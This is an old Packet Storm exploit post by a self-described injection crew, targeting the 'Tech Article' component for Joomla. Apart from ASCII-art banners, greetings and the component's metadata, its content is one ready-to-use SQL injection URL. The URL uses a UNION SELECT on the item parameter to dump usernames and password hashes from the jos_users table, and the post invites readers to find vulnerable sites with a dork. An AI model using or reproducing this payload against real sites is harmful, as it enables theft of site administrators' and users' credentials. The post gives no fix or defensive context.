Joomla Tech Article SQL Injection

2008-12-22T00:00:00
ID PACKETSTORM:73180
Type packetstorm
Reporter Cyb3r-1sT
Modified 2008-12-22T00:00:00

Description

                                        
                                            `   
|| || | ||   
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,   
( : / (_) / ( .   
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
| _ __ __ __ ______ |  
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |  
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |  
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |  
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |  
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |  
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |  
| \ \____/ >> Kings of injection |  
| \/___/ |  
| |  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
  
  
<<!>> Found by : Cyb3r-1sT  
  
<<!>> C0ntact : cyb3r-1st [at] hotmail.com   
  
<<!>> Groups : InjEctOr5 T3am   
  
=======================================================  
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++  
=======================================================  
  
  
<<->> D0rk : find it  
  
<<->> Exploit :>>>   
  
:>>> http://www.site.me/index.php?option=com_tech_article&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users--&task=item  
  
  
=======================================================  
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++  
=======================================================  
  
<<->> All freinds , all muslims , str0ke   
  
side note:  
<name>tech_article</name>  
<creationDate>3-23-2006</creationDate>  
<author>Anthony Ferrara</author>  
<copyright>GPL</copyright>  
<authorEmail>ircmaxell@yahoo.com</authorEmail>  
<authorUrl>www.ircmaxell.com</authorUrl>  
<version>1.0.1</version>  
<description>Tech Article Component For Joomla</description>  
  
  
`